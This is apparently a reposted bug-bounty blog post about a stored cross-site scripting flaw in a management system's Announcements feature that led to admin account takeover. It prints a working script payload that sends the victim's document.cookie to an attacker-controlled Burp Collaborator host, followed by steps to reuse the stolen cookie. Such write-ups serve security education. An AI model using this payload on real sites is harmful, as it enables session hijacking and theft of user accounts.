The Story of a Mass Account Takeover Though Stored XSS (Cross-Site Scripting).

6 months ago 47
BOOK THIS SPACE FOR AD
ARTICLE AD

Rajdip Chavan

ACCOUNT TAKEOVER

Hey there,

As this is my first article, so pardon me if there are any mistakes and do let me know how can I improve.

So without wasting any time lets jump into the main story.

A brief overview of the application: It served as a Management System featuring User Management and Report generation functionalities. Interestingly, it included a feature called Announcements, allowing any user to broadcast messages to other users within the organization. These announcements would be prominently displayed on their dashboard.

Now, if you have guessed it correctly the announcement functionality was vulnerable to XSS.

Lets see the steps to take over ADMIN account:-

Create the new announcement with the below XSS payload to fetch the ADMIN cookies.<script>new Image().src="http://<Your Burp Collaborator Link>/abc.php?output="+document.cookie;</script>

2. Now whenever the admin will login to the application our payload will execute and we will get the admin cookies.

XSS Payload Executed
Cookies fetched in Burp Collaborator

3. Now by normally changing the cookies value in browser (Assuming you know how to do that) we can have access the ADMIN account.

That’s how we can takeover any users account which is working in that organization.But………….,Wait!! can we chain this bug to exploit any further vulnerability??

Yes!!, In the Next Article we will see how i chain this bug to gain RCE.!!

Until Then, Enjoy the life and See you soon.

Bye Bye ! Sayonara!
Read Entire Article